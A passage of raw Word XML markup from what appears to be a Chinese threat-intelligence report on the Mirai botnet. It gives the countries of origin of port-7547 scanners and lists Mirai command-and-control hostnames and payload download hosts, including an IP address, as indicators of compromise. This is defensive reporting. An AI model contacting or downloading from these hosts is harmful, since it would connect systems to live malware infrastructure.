          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00AC028D" w:rsidRPr="00AC028D">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
          <w:r w:rsidR="0009519D">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="0009519D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="0009519D" w:rsidP="0009519D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们根据宁夏</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>派网数据</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>统计了11月27日19时</w:t>
      </w:r>
      <w:r w:rsidR="00ED480A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00ED480A">
        <w:t>20时</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流入省口的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004F5E64">
        <w:t>7547</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描者</w:t>
      </w:r>
      <w:r w:rsidR="004F5E64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Top100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发现它们主要来自于</w:t>
      </w:r>
      <w:r w:rsidR="00AC4DDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="0009519D" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>巴西(</w:t>
      </w:r>
      <w:r>
        <w:t>25%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="0009519D" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>伊朗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>25%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="0009519D" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>英国</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>17%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="0009519D" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中国其他省市(</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="0009519D" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>澳大利亚(</w:t>
      </w:r>
      <w:r>
        <w:t>8%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009519D" w:rsidRDefault="0009519D" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>土耳其</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>5%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="00AC4DDD" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>芬兰</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>2%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="00AC4DDD" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>巴基斯坦</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>2%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F5E64" w:rsidRDefault="004F5E64" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>法国</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>1%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F5E64" w:rsidRDefault="004F5E64" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>智利</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>1%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE5D01" w:rsidRDefault="00CE5D01" w:rsidP="00CE5D01">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>瑞典(</w:t>
      </w:r>
      <w:r>
        <w:t>1%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE5D01" w:rsidRDefault="00CE5D01" w:rsidP="00CE5D01">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>泰国</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>1%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE5D01" w:rsidRDefault="00CE5D01" w:rsidP="00CE5D01">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>印度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>1%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE5D01" w:rsidRDefault="00AA0FE9" w:rsidP="00AA0FE9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>60给出的数据同我们基本相同</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-777330451"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION 360161 \l 2052</w:instrText>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00AC028D" w:rsidRPr="00AC028D">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[5]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6ECE" w:rsidRDefault="003C6ECE" w:rsidP="003C6ECE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc469905248"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C&amp;</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>主机</w:t>
      </w:r>
      <w:r w:rsidR="00583BC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r w:rsidR="00583BC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DGA</w:t>
      </w:r>
      <w:r w:rsidR="00827A50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特征</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="003C6ECE" w:rsidRPr="00697F42" w:rsidRDefault="003C6ECE" w:rsidP="003C6ECE">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>主控的域名注册非常谨慎，IP地址频繁变换，绝大多数主控在域名注</w:t>
      </w:r>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>册时在TLD、注册局、注册邮箱方面设置了多重障碍阻滞安全社区的进一步分析</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-639340145"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="00697F42">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00697F42">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00697F42">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 36016 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidRPr="00697F42">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00697F42">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[8]</w:t>
          </w:r>
          <w:r w:rsidRPr="00697F42">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6ECE" w:rsidRPr="00697F42" w:rsidRDefault="003C6ECE" w:rsidP="003C6ECE">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>目前我们搜集到的主控主机名包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6ECE" w:rsidRPr="00697F42" w:rsidRDefault="003C6ECE" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>report.santasbigcandycane.cx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6ECE" w:rsidRPr="00697F42" w:rsidRDefault="003C6ECE" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>check.securityupdates.us</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6ECE" w:rsidRPr="00697F42" w:rsidRDefault="003C6ECE" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>linux.securityupdates.us</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6ECE" w:rsidRPr="00697F42" w:rsidRDefault="003C6ECE" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>rep.securityupdates.us</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6ECE" w:rsidRPr="00697F42" w:rsidRDefault="003C6ECE" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>xxx.securityupdates.us</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6ECE" w:rsidRDefault="003C6ECE" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>ntp.timeserver.host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63C30" w:rsidRPr="00F63C30" w:rsidRDefault="00F63C30" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>zugzwang.me</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63C30" w:rsidRPr="00F63C30" w:rsidRDefault="00F63C30" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>tr069.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63C30" w:rsidRPr="00F63C30" w:rsidRDefault="00F63C30" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>tr069.tech</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63C30" w:rsidRPr="00F63C30" w:rsidRDefault="00F63C30" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>tr069.support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63C30" w:rsidRPr="00697F42" w:rsidRDefault="00F63C30" w:rsidP="003C6ECE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="422"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001C5E0F" w:rsidRPr="001C5E0F" w:rsidRDefault="001C5E0F" w:rsidP="003C6ECE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C5E0F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>程序下载主机包括：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C5E0F" w:rsidRPr="00697F42" w:rsidRDefault="001C5E0F" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>p.ocalhost.host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C5E0F" w:rsidRDefault="001C5E0F" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>l.ocalhost.host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35AF1" w:rsidRPr="00697F42" w:rsidRDefault="00D35AF1" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>tr069</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ab"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35AF1">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>pw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C5E0F" w:rsidRDefault="00D35AF1" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>5.8.65.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35AF1">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450BA2" w:rsidRPr="00697F42" w:rsidRDefault="00450BA2" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>check.kernelorg.download</w:t>
